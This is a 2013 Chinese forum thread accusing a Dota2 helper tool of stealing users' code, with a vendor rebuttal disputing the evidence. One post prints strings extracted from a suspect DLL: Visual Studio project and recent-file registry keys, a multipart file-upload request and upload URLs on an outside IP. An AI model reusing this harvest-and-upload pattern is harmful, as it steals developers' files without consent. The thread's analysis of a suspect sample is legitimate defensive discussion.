U9超级助手修改游戏文件，偷用户代码，各位上传杀软吧

显示全部楼层 · 发表于 2013-8-29 15:24:06

墨家小子发表于 2013-8-29 15:23
真相出来没？

他们上传文件的服务器现在已经关了。
我估计他们下午要更新版本，哈哈。

显示全部楼层 · 发表于 2013-8-29 15:25:17

幻色清风发表于 2013-8-29 15:24
他们上传文件的服务器现在已经关了。
我估计他们下午要更新版本，哈哈。

新旧一对比不就知道了吗？

显示全部楼层 · 发表于 2013-8-29 15:25:29

墨家小子发表于 2013-8-29 15:23
真相出来没？

bav的人要我自己去跑真相。

显示全部楼层 · 发表于 2013-8-29 15:26:35

XywCloud 发表于 2013-8-29 15:25
bav的人要我自己去跑真相。

百度？
你开个抓包工具也可以。

显示全部楼层 · 发表于 2013-8-29 15:27:48

本帖最后由 prawnliu 于 2013-8-29 15:33 编辑

拜托造假造的真实点好么？
refer和host都是localhost，本地做个域名那么难么？

当然，你一定会强调IP的问题
呵呵~
用您的话——“懂的人自然懂”
用过wireshark的人都知道做这么个假有多简单~~

另外感谢LZ推荐
作为Dota2玩家，晚上去下个U9的这个超级助手用用。

显示全部楼层 · 发表于 2013-8-29 15:29:56

关于此事的一个小结。附图4张，我会一一说清楚。

截图1、2
关于U9DOTA2助手屏蔽了巨盾的DOTA2猴子辅助之后，猴子辅助的相关人员与我方(U9)相关人员的聊天记录，这是全部聊天记录。

截图3，360认证中心(http://renzheng.360.cn)对U9DOTA2助手的检测报告。

截图4，金山认证中心(http://rz.ijinshan.com/)对U9DOTA2助手的检测报告。

============================================================

对于LZ所提供的资料，我做此回应：
1、LZ所提供的行为报告无法证明是我们U9DOTA2助手的报告

2、1楼附件中上传的文件无法证明是U9DOTA2助手中的原版，无法证明是否在下载之后被篡改过。

3、对于游戏的注入行为和修改是U9DOTA2助手所做的，且在Win32下这属于正常行为，但LZ所提供的截图无法证明就是U9DOTA2助手所为。

4、楼主并未提供出可以查看被上传文件的url，无法证明此事真实存在。

5、经过简单的百度搜索，LZ与我们(U9)属于竞争对手，存在恶意抹黑的嫌疑(并且属于低级黑)。

6、具体的结果，我希望等待一个专业的杀软技术人员提供的针对性研究报告，而不是楼主这样随便截图配字就摆出问题定性的态度。

做人做事要认真，既然说我们是病毒，请准备了充足的证据再发，造谣影响的不只是我们的软件，还有你个人的信誉。

致各位即将回帖的人，请先看清楚本贴所有内容，谨慎回复，避免造成误会。

显示全部楼层 · 发表于 2013-8-29 15:30:44

幻色清风发表于 2013-8-29 14:28
你直接下他们的压缩包，里面的：
steam_api.dll
steamlib.dll

非常谢谢。看了确实不太对劲

Software\Microsoft\VisualStudio\7.0\VisualStudioProjectsLocation Software\Microsoft\VisualStudio\8.0\VisualStudioProjectsLocation Software\Microsoft\VisualStudio\9.0\VisualStudioProjectsLocation Software\Microsoft\VisualStudio\10.0\VisualStudioProjectsLocation Software\Microsoft\VisualStudio\11.0\VisualStudioProjectsLocation Software\Microsoft\VisualStudio\7.0\FileMRUList\File Software\Microsoft\VisualStudio\8.0\FileMRUList\File Software\Microsoft\VisualStudio\9.0\FileMRUList\File Software\Microsoft\VisualStudio\10.0\FileMRUList\File Software\Microsoft\VisualStudio\11.0\FileMRUList\File Software\Microsoft\VisualStudio\7.0\ProjectMRUList\File Software\Microsoft\VisualStudio\8.0\ProjectMRUList\File Software\Microsoft\VisualStudio\9.0\ProjectMRUList\File Software\Microsoft\VisualStudio\10.0\ProjectMRUList\File Software\Microsoft\VisualStudio\11.0\ProjectMRUList\File
( 7 F
   * ..    ?cAH汄讂>文件名 -----------------------------7dc1c52230c64
Content-Disposition: form-data; name="upload_file"; filename="文件名"
Content-Type: application/octet-stream

-----------------------------7dc1c52230c64-- Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://localhost/tf/checkout/checkout.php
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 732; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7dc1c52230c64
Accept-Encoding: gzip, deflate
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache
POST http://192.157.208.72/checkout/checkout.php http://192.157.208.72/checkout/check.php?action=check&md5=    <$$> </$$>    @http://192.157.208.72/checkout/check.php?action=add&md5= 成功 WinINet.dll CreateThread MsgWaitForMultipleObjects TerminateThread CloseHandle InternetOpenA InternetConnectA InternetCloseHandle HttpOpenRequestA HttpSendRequestA InternetReadFile HttpQueryInfoA InternetSetCookieA RegOpenKeyExA RegQueryValueExA RegCloseKey 竬Z h圸 error program internal error number is %d. (0x%Xh) 内存不足 %f  %lf %I64d %d  假  真  　  , blackmoon 不支持系统功能函数%d. 请将此信息反馈给作者  ERROR BlackMoon RunTime Error:

居然没有vs6

坐等作者解释这个是什么功能。。。

显示全部楼层 · 发表于 2013-8-29 15:31:21

XywCloud 发表于 2013-8-29 15:25
bav的人要我自己去跑真相。

高手

显示全部楼层 · 发表于 2013-8-29 15:32:37

墨家小子发表于 2013-8-29 15:31
高手

火狐姐教我吧！！！
我现在有沙箱、虚拟机、procexp、procmon。。。我该怎么做？

显示全部楼层 · 发表于 2013-8-29 15:33:30

XywCloud 发表于 2013-8-29 15:32
火狐姐教我吧！！！
我现在有沙箱、虚拟机、procexp、procmon。。。我该怎么做？

我就是一看热闹的

[病毒样本] U9超级助手修改游戏文件，偷用户代码，各位上传杀软吧

本帖子中包含更多资源

评分

本帖子中包含更多资源